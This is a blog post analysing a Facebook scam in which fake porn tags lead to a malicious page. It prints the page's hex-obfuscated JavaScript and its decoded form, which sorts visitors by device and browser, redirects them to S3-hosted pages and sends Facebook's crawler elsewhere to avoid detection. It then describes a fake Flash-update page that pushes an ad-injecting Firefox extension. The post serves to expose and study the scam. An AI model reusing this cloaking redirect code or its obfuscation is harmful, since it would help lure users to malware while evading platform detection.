Virus porno on Facebook

Recently I’ve seen various posts on Facebook where a person was tagged on a porn video or porn photo. This is a virus that can infect various desktop and mobile OS and various browsers. If you click on that post it will open an external page such as that you can view on the photo below:

Facebook Virus

 

Using a Linux VM i opened this link and analysed the code of that page and i’ve seen the code of page is obfuscated. This is the original code:

<Script Language='Javascript'>
<!-- HTML Encryption provided by iWEBTOOL.com -->
<!--
document.write(unescape('%0A%0A%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%2F%2F%20%3C%21%5B%43%44%41%54%41%5B%0A%69%66%20%28%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%41%6E%64%72%6F%69%64%27%29%20%21%3D%20%2D%31%29%20%29%20%7B%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%3A%2F%2F%76%69%64%65%6F%33%36%34%37%33%32%73%2E%73%33%2D%77%65%62%73%69%74%65%2D%75%73%2D%65%61%73%74%2D%31%2E%61%6D%61%7A%6F%6E%61%77%73%2E%63%6F%6D%2F%73%2E%68%74%6D%6C%22%3B%0A%7D%20%2F%2F%20%5D%5D%3E%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%6A%61%76%61%73%63%72%69%70%74%3E%0A%69%66%28%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%37%35%5C%78%37%33%5C%78%36%35%5C%78%37%32%5C%78%34%31%5C%78%36%37%5C%78%36%35%5C%78%36%45%5C%78%37%34%22%5D%5B%22%5C%78%36%44%5C%78%36%31%5C%78%37%34%5C%78%36%33%5C%78%36%38%22%5D%28%2F%69%50%68%6F%6E%65%2F%69%29%29%7C%7C%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%37%35%5C%78%37%33%5C%78%36%35%5C%78%37%32%5C%78%34%31%5C%78%36%37%5C%78%36%35%5C%78%36%45%5C%78%37%34%22%5D%5B%22%5C%78%36%44%5C%78%36%31%5C%78%37%34%5C%78%36%33%5C%78%36%38%22%5D%28%2F%69%50%6F%64%2F%69%29%29%29%7B%6C%6F%63%61%74%69%6F%6E%5B%22%5C%78%37%32%5C%78%36%35%5C%78%37%30%5C%78%36%43%5C%78%36%31%5C%78%36%33%5C%78%36%35%22%5D%28%22%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%37%36%5C%78%36%39%5C%78%36%34%5C%78%36%35%5C%78%36%46%5C%78%33%33%5C%78%33%36%5C%78%33%34%5C%78%33%37%5C%78%33%33%5C%78%33%32%5C%78%37%33%5C%78%32%45%5C%78%37%33%5C%78%33%33%5C%78%32%44%5C%78%37%37%5C%78%36%35%5C%78%36%32%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%35%5C%78%32%44%5C%78%37%35%5C%78%37%33%5C%78%32%44%5C%78%36%35%5C%78%36%31%5C%78%37%33%5C%78%37%34%5C%78%32%44%5C%78%33%31%5C%78%32%45%5C%78%36%31%5C%78%36%44%5C%78%36%31%5C%78%37%41%5C%78%36%46%5C%78%36%45%5C%78%36%31%5C%78%37%37%5C%78%37%33%5C%78%32%45%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%32%46%5C%78%37%33%5C%78%32%45%5C%78%36%38%5C%78%37%34%5C%78%36%44%5C%78%36%43%22%29%7D%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%20%3C%62%6F%64%79%3E%0A%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%0A%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%36%31%5C%78%37%30%5C%78%37%30%5C%78%35%36%5C%78%36%35%5C%78%37%32%5C%78%37%33%5C%78%36%39%5C%78%36%46%5C%78%36%45%22%5D%5B%22%5C%78%36%39%5C%78%36%45%5C%78%36%34%5C%78%36%35%5C%78%37%38%5C%78%34%46%5C%78%36%36%22%5D%28%22%5C%78%35%37%5C%78%36%39%5C%78%36%45%22%29%21%3D%20%2D%31%29%7B%77%69%6E%64%6F%77%5B%22%5C%78%36%43%5C%78%36%46%5C%78%36%33%5C%78%36%31%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%22%5D%3D%22%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%37%33%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%37%33%5C%78%33%33%5C%78%32%45%5C%78%36%31%5C%78%36%44%5C%78%36%31%5C%78%37%41%5C%78%36%46%5C%78%36%45%5C%78%36%31%5C%78%37%37%5C%78%37%33%5C%78%32%45%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%32%46%5C%78%37%36%5C%78%36%39%5C%78%36%34%5C%78%36%35%5C%78%36%46%5C%78%33%33%5C%78%33%36%5C%78%33%34%5C%78%33%37%5C%78%33%33%5C%78%33%32%5C%78%37%33%5C%78%32%46%5C%78%37%32%5C%78%36%35%5C%78%36%34%5C%78%32%45%5C%78%36%38%5C%78%37%34%5C%78%36%44%5C%78%36%43%22%7D%3B%0A%0A%0A%0A%3C%2F%73%63%72%69%70%74%3E%0A%0A%3C%73%63%72%69%70%74%3E%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%37%35%5C%78%37%33%5C%78%36%35%5C%78%37%32%5C%78%34%31%5C%78%36%37%5C%78%36%35%5C%78%36%45%5C%78%37%34%22%5D%5B%22%5C%78%36%39%5C%78%36%45%5C%78%36%34%5C%78%36%35%5C%78%37%38%5C%78%34%46%5C%78%36%36%22%5D%28%22%5C%78%34%36%5C%78%36%39%5C%78%37%32%5C%78%36%35%5C%78%36%36%5C%78%36%46%5C%78%37%38%22%29%21%3D%20%2D%31%29%7B%77%69%6E%64%6F%77%5B%22%5C%78%36%43%5C%78%36%46%5C%78%36%33%5C%78%36%31%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%22%5D%3D%22%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%37%36%5C%78%36%39%5C%78%36%34%5C%78%36%35%5C%78%36%46%5C%78%33%33%5C%78%33%36%5C%78%33%34%5C%78%33%37%5C%78%33%33%5C%78%33%32%5C%78%37%33%5C%78%32%45%5C%78%37%33%5C%78%33%33%5C%78%32%44%5C%78%37%37%5C%78%36%35%5C%78%36%32%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%35%5C%78%32%44%5C%78%37%35%5C%78%37%33%5C%78%32%44%5C%78%36%35%5C%78%36%31%5C%78%37%33%5C%78%37%34%5C%78%32%44%5C%78%33%31%5C%78%32%45%5C%78%36%31%5C%78%36%44%5C%78%36%31%5C%78%37%41%5C%78%36%46%5C%78%36%45%5C%78%36%31%5C%78%37%37%5C%78%37%33%5C%78%32%45%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%32%46%5C%78%36%44%5C%78%36%36%5C%78%33%34%5C%78%33%30%5C%78%32%45%5C%78%36%38%5C%78%37%34%5C%78%36%44%5C%78%36%43%22%7D%65%6C%73%65%20%7B%69%66%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%37%35%5C%78%37%33%5C%78%36%35%5C%78%37%32%5C%78%34%31%5C%78%36%37%5C%78%36%35%5C%78%36%45%5C%78%37%34%22%5D%5B%22%5C%78%36%39%5C%78%36%45%5C%78%36%34%5C%78%36%35%5C%78%37%38%5C%78%34%46%5C%78%36%36%22%5D%28%22%5C%78%34%36%5C%78%36%31%5C%78%36%33%5C%78%36%35%5C%78%36%32%5C%78%36%46%5C%78%36%46%5C%78%36%42%5C%78%32%30%5C%78%34%32%5C%78%36%46%5C%78%37%34%22%29%21%3D%20%2D%31%29%7B%77%69%6E%64%6F%77%5B%22%5C%78%36%43%5C%78%36%46%5C%78%36%33%5C%78%36%31%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%22%5D%3D%22%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%36%37%5C%78%36%46%5C%78%36%46%5C%78%36%37%5C%78%36%43%5C%78%36%35%5C%78%32%45%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%32%46%22%7D%65%6C%73%65%20%7B%69%66%28%6E%61%76%69%67%61%74%6F%72%5B%22%5C%78%37%35%5C%78%37%33%5C%78%36%35%5C%78%37%32%5C%78%34%31%5C%78%36%37%5C%78%36%35%5C%78%36%45%5C%78%37%34%22%5D%5B%22%5C%78%36%39%5C%78%36%45%5C%78%36%34%5C%78%36%35%5C%78%37%38%5C%78%34%46%5C%78%36%36%22%5D%28%22%5C%78%34%33%5C%78%36%38%5C%78%37%32%5C%78%36%46%5C%78%36%44%5C%78%36%35%22%29%21%3D%20%2D%31%29%7B%7D%65%6C%73%65%20%7B%77%69%6E%64%6F%77%5B%22%5C%78%36%43%5C%78%36%46%5C%78%36%33%5C%78%36%31%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%22%5D%3D%22%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%37%36%5C%78%36%39%5C%78%36%34%5C%78%36%35%5C%78%36%46%5C%78%33%33%5C%78%33%36%5C%78%33%34%5C%78%33%37%5C%78%33%33%5C%78%33%32%5C%78%37%33%5C%78%32%45%5C%78%37%33%5C%78%33%33%5C%78%32%44%5C%78%37%37%5C%78%36%35%5C%78%36%32%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%35%5C%78%32%44%5C%78%37%35%5C%78%37%33%5C%78%32%44%5C%78%36%35%5C%78%36%31%5C%78%37%33%5C%78%37%34%5C%78%32%44%5C%78%33%31%5C%78%32%45%5C%78%36%31%5C%78%36%44%5C%78%36%31%5C%78%37%41%5C%78%36%46%5C%78%36%45%5C%78%36%31%5C%78%37%37%5C%78%37%33%5C%78%32%45%5C%78%36%33%5C%78%36%46%5C%78%36%44%5C%78%32%46%5C%78%37%33%5C%78%32%45%5C%78%36%38%5C%78%37%34%5C%78%36%44%5C%78%36%43%22%7D%7D%7D%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E'));
//-->
</Script>

 

So it is not really “encrypted” since there is no key. This method works by replacing every ASCII charachter with it’s hexadecimal value. Using some online tools, like DDecode, the web page’s code is deobfuscated and this is the result:

<script type="text/javascript"> // <![CDATA[if ( (navigator.userAgent.indexOf('Android') != -1) ) {document.location = "http://video364732s.s3-website-us-east-1.amazonaws.com/s.html";} // ]]>
</script>
<script language=javascript>
if((navigator["userAgent"]["match"](/iPhone/i))||(navigator["userAgent"]["match"](/iPod/i))){
location["replace"]("http://video364732s.s3-website-us-east-1.amazonaws.com/s.html")};
</script> 
<body>
<script type="text/javascript">
if(navigator["appVersion"]["indexOf"]("Win")!= -1){
window["location"]="https://s3.amazonaws.com/video364732s/red.html"
};
</script>
<script>
if(navigator["userAgent"]["indexOf"]("Firefox")!= -1){
window["location"]="http://video364732s.s3-website-us-east-1.amazonaws.com/mf40.html"
}else {
if(navigator["userAgent"]["indexOf"]("Facebook Bot")!= -1){
window["location"]="http://google.com/"
}else {
if(navigator["userAgent"]["indexOf"]("Chrome")!= -1){}else {
window["location"]="http://video364732s.s3-website-us-east-1.amazonaws.com/s.html"
}
}
};
</script>
</body>

 

How you can see, this script uses some controls and analyses the versions of Android, iPhone, Windows, Firefox Browser and Chrome Browser and then redirect the user to some infected page. Notice also how they try to hide from the Facebook crawler bot by adding an exception.

I followed the link (the Firefox one) and landed me on a well-made fake Youtube page saying that Adobe Flash has crashed and I should update. Scammers really care for the users.

fake youtube page

Oh noes, Flash has crashed! 🙁

 

Clicking on the inviting blue button, redirects the user to a Firefox extension download. “Untrusted connection” protection warned me that ssl cert was indeed not valid, and I confirmed the security exception (a really nasty thing to do).
Extracting the .xpi reveals an ad-injecting addon.

If I find how to remove this virus, I will update the post.

For now that’s it!